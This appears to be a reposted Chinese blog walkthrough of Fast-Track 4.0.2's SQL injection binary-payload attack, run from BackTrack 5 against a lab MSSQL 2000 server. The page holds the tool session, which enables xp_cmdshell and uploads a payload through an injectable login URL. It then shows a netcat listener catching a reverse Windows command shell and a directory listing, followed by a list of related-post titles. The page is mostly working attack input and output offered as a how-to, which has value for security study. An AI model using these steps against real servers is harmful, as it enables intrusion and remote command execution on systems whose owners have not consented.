SQL Injector - GET Manual Setup Binary Payload Attack
来源:互联网 发布:淘宝类目放错了怎么办 编辑:程序博客网 时间:2024/06/06 08:39
bt5上操作:
***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Enter which SQL Injector you want to use: 1. SQL Injector - Query String Parameter Attack 2. SQL Injector - POST Parameter Attack 3. SQL Injector - GET FTP Payload Attack 4. SQL Injector - GET Manual Setup Binary Payload Attack (q)uit Enter your choice: 4 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** ***************************************************************** The manual portion allows you to customize your attack for whatever reason. You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE So for example, when the tool asks you for the SQL Injectable URL, type: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah <ctrl>-c to exit to Main Menu... Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHEREEnter the IP Address of server with NetCat Listening: 192.168.1.11Enter Port number with NetCat listening: 9090 Sending initial request to enable xp_cmdshell if disabled.... Sending first portion of payload.... Sending second portion of payload.... Sending next portion of payload... Sending the last portion of the payload... Running cleanup... Running the payload on the server...
另起一个bash运行nc获得了反向cmdshell:
root@bt:~# nc -l -p 9090Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\WINDOWS\system32>cd ..cd ..C:\WINDOWS>cd ..cd ..C:\>dirdir 驱动器 C 中的卷没有标签。 卷的序列号是 3052-FA52 C:\ 的目录2012-03-24 11:55 0 AUTOEXEC.BAT2012-03-24 11:55 0 CONFIG.SYS2012-03-24 11:59 <DIR> Documents and Settings2013-07-02 21:45 <DIR> msf32012-08-07 03:10 176,204,554 msf3.zip2004-12-29 13:07 61,440 nc.exe2013-07-01 22:45 <DIR> Program Files2013-05-01 22:15 16,232,448 python-2.7.4.msi2013-07-06 17:57 <DIR> Python272013-04-07 21:03 70,402,968 SQL2000SP4.exe2013-06-30 21:58 <DIR> SQL2KSP42013-06-30 21:53 <DIR> SQLEVAL2011-03-22 17:38 349,280,992 sqleval.exe2013-07-01 20:52 <DIR> WINDOWS2013-05-22 20:55 20,868,704 Wireshark-win32-1.8.7.exe 8 个文件 633,051,106 字节 7 个目录 3,908,493,312 可用字节C:\>exitexitroot@bt:~#
- SQL Injector - GET Manual Setup Binary Payload Attack
- SQL Injector - POST Parameter Attack
- MSSQL2K - SQL Injector - Query String Parameter Attack
- MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
- MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
- @Injector
- SQL Injection Attack
- SQL injection attack
- payload
- payload
- SQL Profiles-MANUAL
- cygwin unable to get setup
- Attack
- Attack
- SQL replication setup
- nutch-1.7-学习笔记(1)-org.apache.nutch.crawl.Injector.java-Filesystem.get()
- AngularJS依赖注入常用对象注入器 $injector常用API方法,get、has、invoke
- manual
- 123
- XmlTextWriter学习总结
- Yacc介绍与使用
- C的数据类型关键字
- 万象广告屏蔽软件-针对所有的正式版---2013-7-8测试有效
- SQL Injector - GET Manual Setup Binary Payload Attack
- 双绞线序
- NYOJ---括号匹配问题---栈的使用
- 读书笔记
- CPU和内存之间——地址映射(知识总结)
- Win32学习笔记——WM_PAINT
- nand_flash_driver读书笔记
- 8111B网卡客户机关机后再开机,需要重新拨插电源才能启动解决办法。(无盘环境)
- 面试题 (一)